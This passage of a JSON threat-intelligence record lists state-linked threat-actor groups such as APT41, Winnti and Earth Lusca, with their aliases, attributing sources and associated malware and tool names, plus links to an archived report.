"SerialVlogger", "ShadowHammer", "ShadowPad Winnti", "SinoChopper", "Skip-2.0", "SneakCross", "Sogu", "Speculoos", "Spyder", "StealthReacher", "StealthVector", "TERA", "TIDYELF", "TIGERPLUG", "TOMMYGUN", "TVT", "Thoper", "Voldemort", "WIDETONE", "WINNKIT", "WINTERLOVE", "Winnti", "WyrmSpy", "X-Door", "XDOOR", "XMRig", "XShellGhost", "Xamtrav", "ZXShell", "ZoxPNG", "certutil", "certutil.exe", "cobeacon", "gresim", "njRAT", "pwdump", "xDll" ], "source_id": "ETDA", "reports": null }, { "id": "4d5f939b-aea9-4a0e-8bff-003079a261ea", "created_at": "2023-01-06T13:46:39.04841Z", "updated_at": "2026-04-10T02:00:03.196806Z", "deleted_at": null, "main_name": "APT41", "aliases": [ "WICKED PANDA", "BRONZE EXPORT", "Brass Typhoon", "TG-2633", "Leopard Typhoon", "G0096", "Grayfly", "BARIUM", "BRONZE ATLAS", "Red Kelpie", "G0044", "Earth Baku", "TA415", "WICKED SPIDER", "HOODOO", "Winnti", "Double Dragon" ], "source_name": "MISPGALAXY:APT41", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "6de442c2-1335-4c96-9f9b-87f61a52074e", "created_at": "2025-05-18T02:00:03.043587Z", "updated_at": "2026-04-10T02:00:03.840911Z", "deleted_at": null, "main_name": "FishMedley", "aliases": [], "source_name": "MISPGALAXY:FishMedley", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "945a572f-ebe3-4e2f-a288-512fe751cfa8", "created_at": "2022-10-25T16:07:24.413971Z", "updated_at": "2026-04-10T02:00:04.97924Z", "deleted_at": null, "main_name": "Winnti Group", "aliases": [ "G0044", "Leopard Typhoon", "Wicked Panda", "Winnti Group" ], "source_name": "ETDA:Winnti Group", "tools": [ "Agentemis", "BleDoor", "Cobalt Strike", "CobaltStrike", "FunnySwitch", "RbDoor", "RibDoor", "RouterGod", "Winnti", "cobeacon" ], "source_id": "ETDA", "reports": null }, { "id": "2a24d664-6a72-4b4c-9f54-1553b64c453c", "created_at": "2025-08-07T02:03:24.553048Z", "updated_at": "2026-04-10T02:00:03.787296Z", "deleted_at": null, "main_name": "BRONZE ATLAS", "aliases": [ "APT41 ", "BARIUM ", "Blackfly ", "Brass Typhoon", "CTG-2633", "Earth Baku ", "GREF", "Group 72 ", "Red Kelpie ", "TA415 ", "TG-2633 ", "Wicked Panda ", "Winnti" ], "source_name": "Secureworks:BRONZE ATLAS", "tools": [ "Acehash", "CCleaner v5.33 backdoor", "ChinaChopper", "Cobalt Strike", "DUSTPAN", "Dicey MSDN", "Dodgebox", "ForkPlayground", "HUC Proxy Malware (Htran)" ], "source_id": "Secureworks", "reports": null }, { "id": "ba3eea09-ce30-4cfa-ae3a-b5992c4b81f8", "created_at": "2022-10-25T15:50:23.441443Z", "updated_at": "2026-04-10T02:00:05.263145Z", "deleted_at": null, "main_name": "Aquatic Panda", "aliases": [ "Aquatic Panda" ], "source_name": "MITRE:Aquatic Panda", "tools": [ "Wevtutil", "Winnti for Windows", "njRAT", "Cobalt Strike", "ShadowPad", "Winnti for Linux" ], "source_id": "MITRE", "reports": null }, { "id": "ba3fff0c-3ba0-4855-9eeb-1af9ee18136a", "created_at": "2022-10-25T15:50:23.298889Z", "updated_at": "2026-04-10T02:00:05.316886Z", "deleted_at": null, "main_name": "menuPass", "aliases": [ "menuPass", "POTASSIUM", "Stone Panda", "APT10", "Red Apollo", "CVNX", "HOGFISH", "BRONZE RIVERSIDE" ], "source_name": "MITRE:menuPass", "tools": [ "certutil", "FYAnti", "UPPERCUT", "SNUGRIDE", "P8RAT", "RedLeaves", "SodaMaster", "pwdump", "Mimikatz", "PlugX", "PowerSploit", "ChChes", "cmd", "QuasarRAT", "AdFind", "Cobalt Strike", "PoisonIvy", "EvilGrab", "esentutl", "Impacket", "Ecipekac", "PsExec", "HUI Loader" ], "source_id": "MITRE", "reports": null }, { "id": "18a7b52d-a1cd-43a3-8982-7324e3e676b7", "created_at": "2025-08-07T02:03:24.688416Z", "updated_at": "2026-04-10T02:00:03.734754Z", "deleted_at": null, "main_name": "BRONZE UNIVERSITY", "aliases": [ "Aquatic Panda", "Aquatic Panda ", "CHROMIUM", "CHROMIUM ", "Charcoal Typhoon", "Charcoal Typhoon ", "Earth Lusca", "Earth Lusca ", "FISHMONGER ", "Red Dev 10", "Red Dev 10 ", "Red Scylla", "Red Scylla ", "RedHotel", "RedHotel ", "Tag-22", "Tag-22 " ], "source_name": "Secureworks:BRONZE UNIVERSITY", "tools": [ "Cobalt Strike", "Fishmaster", "FunnySwitch", "Spyder", "njRAT" ], "source_id": "Secureworks", "reports": null }, { "id": "6abcc917-035c-4e9b-a53f-eaee636749c3", "created_at": "2022-10-25T16:07:23.565337Z", "updated_at": "2026-04-10T02:00:04.668393Z", "deleted_at": null, "main_name": "Earth Lusca", "aliases": [ "Bronze University", "Charcoal Typhoon", "Chromium", "G1006", "Red Dev 10", "Red Scylla" ], "source_name": "ETDA:Earth Lusca", "tools": [ "Agentemis", "AntSword", "BIOPASS", "BIOPASS RAT", "BadPotato", "Behinder", "BleDoor", "Cobalt Strike", "CobaltStrike", "Doraemon", "FRP", "Fast Reverse Proxy", "FunnySwitch", "HUC Port Banner Scanner", "KTLVdoor", "Mimikatz", "NBTscan", "POISONPLUG.SHADOW", "PipeMon", "RbDoor", "RibDoor", "RouterGod", "SAMRID", "ShadowPad Winnti", "SprySOCKS", "WinRAR", "Winnti", "XShellGhost", "cobeacon", "fscan", "lcx", "nbtscan" ], "source_id": "ETDA", "reports": null }, { "id": "d53593c3-2819-4af3-bf16-0c39edc64920", "created_at": "2022-10-27T08:27:13.212301Z", "updated_at": "2026-04-10T02:00:05.272802Z", "deleted_at": null, "main_name": "Earth Lusca", "aliases": [ "Earth Lusca", "TAG-22", "Charcoal Typhoon", "CHROMIUM", "ControlX" ], "source_name": "MITRE:Earth Lusca", "tools": [ "Mimikatz", "PowerSploit", "Tasklist", "certutil", "Cobalt Strike", "Winnti for Linux", "Nltest", "NBTscan", "ShadowPad" ], "source_id": "MITRE", "reports": null } ], "ts_created_at": 1775434889, "ts_updated_at": 1775792208, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/7c1b6bb1a9104b7082ee7ef7222b20dd95890321.pdf", "text": "https://archive.orkl.eu/7c1b6bb1a9104b7082ee7ef7222b20dd95890321.txt", "img": "https://archive.orkl.eu/7c1b6bb1a9104b7082ee7ef7222b20dd95890321.jpg" } }